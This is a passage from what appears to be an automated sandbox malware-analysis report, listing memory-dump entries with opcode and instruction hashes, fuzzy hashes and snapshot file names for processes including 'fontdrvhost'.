                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c8fcce93dd80b8859e9696b0038c9f24d0e6fd6c80bd80535d25ce973f789f6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 06113331B1D52E4FEB74EFF8D464AB927D2EF98300F121179D04ED31B2DD28AA428A40
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000018.00000002.1885783495.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 3e574d571f8885a3a85dbe8031dfb29b731920aaf0e1e0d18a8207716cc8260a
                                                                                                                                                                                              • Instruction ID: 687cc3a3cea8edf40a0804a03ab7940dc07df10de09d4a70f3f9bfa1a691555e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e574d571f8885a3a85dbe8031dfb29b731920aaf0e1e0d18a8207716cc8260a
                                                                                                                                                                                              • Instruction Fuzzy Hash: A9116621F1D92E4EEBB4ABB894646BC2691FF4C700F5611B5D44DE32B1DE28AE414B80
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000018.00000002.1885783495.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 0a4f955110fb590b23c005f9a7440a549eb2304b592b0b18dc446930494417c3
                                                                                                                                                                                              • Instruction ID: 49c5dda062d654f937286b0b5d06571fdb676bbe3e384621509eea773a6b9735
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a4f955110fb590b23c005f9a7440a549eb2304b592b0b18dc446930494417c3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 31110232B1E65D8FE7129BB588211AC7BB0EF46710F1640B3C084CB1A2E63827068BC1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000018.00000002.1885783495.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 3963a2f480fb73a24d7c05472baf50df862b8c3f7af13f0f6b006bfae554e83c
                                                                                                                                                                                              • Instruction ID: eb8a04e16cadee238f035969edfc31bfb311dbead473f0209dbe8a313109b16f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3963a2f480fb73a24d7c05472baf50df862b8c3f7af13f0f6b006bfae554e83c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 71012621A8E6D90FE769A7B44C729B23FE1CF8721070A01FAD089CB1E3C84D59878791
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000018.00000002.1885783495.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 6bc5dafa66141f26f2edd5b4f256e8227decedc794a176639a89cc290d4670d5
                                                                                                                                                                                              • Instruction ID: c0037b278c7188cd5570ec0f76475dcf0a2a4651ce8d69002704c82a8e944fb2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6bc5dafa66141f26f2edd5b4f256e8227decedc794a176639a89cc290d4670d5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A010431B1E75C8FE712DBB488610AD7BB0EF06310F1640F3D044CB1A2D63867058B80
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000018.00000002.1885783495.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 6092bf80c3bcf097a19e9f9a55de697585ca094f154de5ec066ca5bd8b23e65b
                                                                                                                                                                                              • Instruction ID: 270d62a6f9196cb358adfe0e07e6dac8ff4ead32a14c9cd572d1826275445c21
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6092bf80c3bcf097a19e9f9a55de697585ca094f154de5ec066ca5bd8b23e65b
                                                                                                                                                                                              • Instruction Fuzzy Hash: E9019E31A1E28D9FE716DBB4886119D7BB0EF06714F1641F7D044DB2A2EA386B45CB81
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000018.00000002.1885783495.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 37a4a8a0ae12c2ee73dda2d7d6746abc8ffd7f23b92ec0e287d8119ed22fc83d
                                                                                                                                                                                              • Instruction ID: 5b78b19c5eeff12e1466b43aa1f59dcbe25489186db7d3cbf4085a85ced7d5be
                                                                                                                                                                                              • Opcode Fuzzy Hash: 37a4a8a0ae12c2ee73dda2d7d6746abc8ffd7f23b92ec0e287d8119ed22fc83d
                                                                                                                                                                                              • Instruction Fuzzy Hash: C3018F31E1E38D9FE716DBB4886419D7BB0EF16704F1641E3D444CB2A2EA386B448B81
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000018.00000002.1885783495.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 761e2923b077f2d9600d50a95bc5eded3f37b587bffd50bfc0c14b2e65bdc6d3
                                                                                                                                                                                              • Instruction ID: 1f37faf91d8c76d5ecd2a927ca0f2589a5e46eff6f9183dc47d22886fa08d732
                                                                                                                                                                                              • Opcode Fuzzy Hash: 761e2923b077f2d9600d50a95bc5eded3f37b587bffd50bfc0c14b2e65bdc6d3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 27F03630B5952E4EEB74AFA4D8A4AF873A1FF49311F1201B9C48ED31B1DD386A818E40
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000018.00000002.1885783495.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 428764437d29e1890ab5c5ac2c1d17129b049794f483ad01c538d826eaafabbb
                                                                                                                                                                                              • Instruction ID: a8ec052c91589c9c2cf574743f195f724d9c6c868be4368a18d4c395f491bf1c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 428764437d29e1890ab5c5ac2c1d17129b049794f483ad01c538d826eaafabbb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 14F03621B1D42E4AEB74DFA4D864AF92392EF88711F131175C48EE31B2DD286A424E80
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000018.00000002.1885783495.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 5b4e99d1b0b784cdb1f6fa5182d7459074232eb65c4bee8e57606b2eedc2eded
                                                                                                                                                                                              • Instruction ID: e847e98db7ddcb7808cd1a1729122eac30a394d666a5adf69ab4b3ded8ded347
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b4e99d1b0b784cdb1f6fa5182d7459074232eb65c4bee8e57606b2eedc2eded
                                                                                                                                                                                              • Instruction Fuzzy Hash: CBE06831608E09CFC741EF79CCD44D17B90FB0A719BEA11AED149C7221D3315929CB40
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000018.00000002.1885783495.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 7640d63fef0eba754b200cf7a4790827c0c2d39345203e22fe14c3187dd7f0db
                                                                                                                                                                                              • Instruction ID: c0d49cec6477640ee91c08e5728feb873b0b923c5ddeba35e10c3cc361a6cec8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7640d63fef0eba754b200cf7a4790827c0c2d39345203e22fe14c3187dd7f0db
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0CE02621F1C85D07EBBCB67428725B072C0DB95314B0502BAD05AC22DADC0D5C824681
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000018.00000002.1885783495.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 9ddc3fee58b07b2687ca37ed0bd7eeef19bed29c54f4b5df6d8e46aeaf8f1149
                                                                                                                                                                                              • Instruction ID: 88587b613b110f5a6d8b77e1e7695de81c2982e5fe688e3892ed6d96937f13ff
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ddc3fee58b07b2687ca37ed0bd7eeef19bed29c54f4b5df6d8e46aeaf8f1149
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4DE0D851D5F76E05E62222BF546609C7A145F9B514F9600B3C45D460B2B88D22990E92
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000018.00000002.1885783495.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: caf9769b7db13766396f1f893b08372476b355b1bf395917b3d0e5c4e8990cee
                                                                                                                                                                                              • Instruction ID: ccd4eedbf3586c25e582238952ac7c6cde5615f3e25e58d7eaeacdb126da0801
                                                                                                                                                                                              • Opcode Fuzzy Hash: caf9769b7db13766396f1f893b08372476b355b1bf395917b3d0e5c4e8990cee
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6CE0ED21F2A12E4AFB75A7A4D8707B96191AF9D700F1600B8D90DD72E2DD286F418E81
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000018.00000002.1885783495.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                                                                                                                                                              • Instruction ID: 75798217d5412b6f5d2becd9b261a2361f6c4f66b86cbaae07526901a7053548
                                                                                                                                                                                              • Opcode Fuzzy Hash: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BC04C05F6B63F01F83577FF98660ACA1409BDEA10FD70176D54D400F19C4D26D909D6
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000018.00000002.1885783495.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 0dc822a51c0cabe518198916ba3302ac1d1f88faaf127e41e827fa079888f130
                                                                                                                                                                                              • Instruction ID: 7f1505de9dad58e20c20eb7dc3ffb8d0d75c31014e7af53b6a44c1ba62b18b37
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0dc822a51c0cabe518198916ba3302ac1d1f88faaf127e41e827fa079888f130
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2CC08C3051180C9FC908EB38C88480433A0FB0D300BC20090E408C7170D62AECC1CB80
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000018.00000002.1885783495.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 4e80f6b96130f5d7351ae104d3d6270a63f24a102d3fc2d6494240c327d15f15
                                                                                                                                                                                              • Instruction ID: 76a2f529881ad0e6e461739e72ffba37b33aad2d2a4f39999295237c5c6581d5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e80f6b96130f5d7351ae104d3d6270a63f24a102d3fc2d6494240c327d15f15
                                                                                                                                                                                              • Instruction Fuzzy Hash: 88C08C305118088FC900F73CC88480032A0FB0D210BC201A0E00EC7174E21A9C80CB40
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000018.00000002.1885783495.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: ee9203f5cfca73b6bb5f5c10cac5e1a35b23f6937631bdb2d21f7764eb99b0c8
                                                                                                                                                                                              • Instruction ID: 9e6807bc411faf6884690c43e71f5ae10de7bc0a1580dbe5dc2cfe875143ebca
                                                                                                                                                                                              • Opcode Fuzzy Hash: ee9203f5cfca73b6bb5f5c10cac5e1a35b23f6937631bdb2d21f7764eb99b0c8
                                                                                                                                                                                              • Instruction Fuzzy Hash: 11C04C05F18C2A47F76A7758587257E44929F54708F990174E02DD77CFCD1C5E0216C7
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000018.00000002.1885783495.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 7d4b389b3a77018b8644886f23d649525823a9c1bf81f5ed4d2098966650345f
                                                                                                                                                                                              • Instruction ID: 5def02801191fc6d2c2422008e9fe55e05c53aff2d9f989a9fc7ee3dacd34aef
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d4b389b3a77018b8644886f23d649525823a9c1bf81f5ed4d2098966650345f
                                                                                                                                                                                              • Instruction Fuzzy Hash: A4C09B15E2906D45E73457B1C4363BA71515F59204F578677405ED6091DD28664159C0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000018.00000002.1885783495.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                                                                                                                                                              • Instruction ID: 07f89380d43a9f96f34254c0bffcaedb631e2eb1b670c8ab6449bd81544f9804
                                                                                                                                                                                              • Opcode Fuzzy Hash: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                                                                                                                                                              • Instruction Fuzzy Hash: AFB01200E6741F00E42433FB08920A470409B4D100FC200B0D40E400A1984D269406C2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 751d5c7e1ab77c6cf37ba7809f5b6af6de7f714cabb33ce4256350495493601b
                                                                                                                                                                                              • Instruction ID: e947b6d47603830d3890e62bb4619dcf25ab6a43b958ad61bbff4237ef7a39fb
                                                                                                                                                                                              • Opcode Fuzzy Hash: 751d5c7e1ab77c6cf37ba7809f5b6af6de7f714cabb33ce4256350495493601b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0BE2A231B1991E4FEBA8EB5884A16B97792FF9C301F1505B9D00DC72E6DE38BD828741
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: I
                                                                                                                                                                                              • API String ID: 0-3707901625
                                                                                                                                                                                              • Opcode ID: d256cf151afe8eff5d8cef71fc01853417fa9c9312340420e5d7147eb2df4ff6
                                                                                                                                                                                              • Instruction ID: a1de2b81498e9183e3f5fc49800a1cbd8ba5ec7de31466eb1e81853637582587
                                                                                                                                                                                              • Opcode Fuzzy Hash: d256cf151afe8eff5d8cef71fc01853417fa9c9312340420e5d7147eb2df4ff6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 10D1E171A7E69E0BE32CA7684CA20757791EF52705B2A43BECDEBC3097DD18690342C1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: 5Z_H
                                                                                                                                                                                              • API String ID: 0-3267294416
                                                                                                                                                                                              • Opcode ID: 65cf8b1e9fd73fe9da1c45988419b61979b8c193bb36033d0837f40e13212b8d
                                                                                                                                                                                              • Instruction ID: a2fc0a3b8b48a0bdc1537389d2f1285f8cc1aba1d8249e5bf8e931591aed7a23
                                                                                                                                                                                              • Opcode Fuzzy Hash: 65cf8b1e9fd73fe9da1c45988419b61979b8c193bb36033d0837f40e13212b8d
                                                                                                                                                                                              • Instruction Fuzzy Hash: A8910471A19A8D8FE789DB6888667E9BFF1FF5A301F4001BAD059C72E6DB781411C341
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 75fbfb9182d77dded30c747d59554397fa0f406a76b8af0593ca74ee605f9927
                                                                                                                                                                                              • Instruction ID: 4fb39794ab92bf15f341759c5770c629a4aa1b7bb8eaf7203a70b70d674f7928
                                                                                                                                                                                              • Opcode Fuzzy Hash: 75fbfb9182d77dded30c747d59554397fa0f406a76b8af0593ca74ee605f9927
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6851E372A2895D8FE798DB5C986A7EABFE0EB9A311F5001BED019C73D6CB7814118300
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: c9$!k9$"s9
                                                                                                                                                                                              • API String ID: 0-3426396564
                                                                                                                                                                                              • Opcode ID: 1fbcaa2146b9788760338b2a87b67a79b1ab569b408ad7510b1716e0bb199863
                                                                                                                                                                                              • Instruction ID: a26c72907a2a95cfbed55df6172d7873c8e4ab6d91d4e036ce94a8a55dd8d3a1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fbcaa2146b9788760338b2a87b67a79b1ab569b408ad7510b1716e0bb199863
                                                                                                                                                                                              • Instruction Fuzzy Hash: 85F02837728E2A8BCB106BBEFC805D5BB80EB99276BD501BBD204C7261E210181AC3D0
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: M
                                                                                                                                                                                              • API String ID: 0-3664761504
                                                                                                                                                                                              • Opcode ID: 45931abc411f0b4cca52f1700d911033bb7a725bbf022b0d18e81bcbac1bca58
                                                                                                                                                                                              • Instruction ID: b51d20806f42eea2ee71813b242ba263ee1312d8fe9b460e741643a7cbbaf4c7
                                                                                                                                                                                              • Opcode Fuzzy Hash: 45931abc411f0b4cca52f1700d911033bb7a725bbf022b0d18e81bcbac1bca58
                                                                                                                                                                                              • Instruction Fuzzy Hash: D5F0B4B094F3D55FCB16A7758829825BFA0EE6724174A01EEC08ACB1A3D92D8886C701
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: M
                                                                                                                                                                                              • API String ID: 0-3664761504
                                                                                                                                                                                              • Opcode ID: 0804eb044144661c6509f4838895a5faae3b7afffdafbf82f29a4018ee8053df
                                                                                                                                                                                              • Instruction ID: 41558eab871f7d0fe2dd2887853a3b76b73fc8dd2b05035a0b283685986a8950
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0804eb044144661c6509f4838895a5faae3b7afffdafbf82f29a4018ee8053df
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5AF0656160F7C48FC716EA7488698557FA0EF6721174A52EFC045CF1A7DA1D9885C701
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: M
                                                                                                                                                                                              • API String ID: 0-3664761504
                                                                                                                                                                                              • Opcode ID: 26b0197b507e82dc9d4165012b381d1127a220714dfcb2791a4311517a942533
                                                                                                                                                                                              • Instruction ID: 3bf72fa62f8e690ea637a901bdab9027ea3a9542c558a4a5346214b395a0946e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 26b0197b507e82dc9d4165012b381d1127a220714dfcb2791a4311517a942533
                                                                                                                                                                                              • Instruction Fuzzy Hash: 98E0396160E7C44FDB1AAB748869454BFA0AF6720174A52EFC045CB1A7EA298889C701
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: M
                                                                                                                                                                                              • API String ID: 0-3664761504
                                                                                                                                                                                              • Opcode ID: 23c7008b6420d38a11a785cc10862ec7b442ee0e9a5cd16a711961c7567ee13f
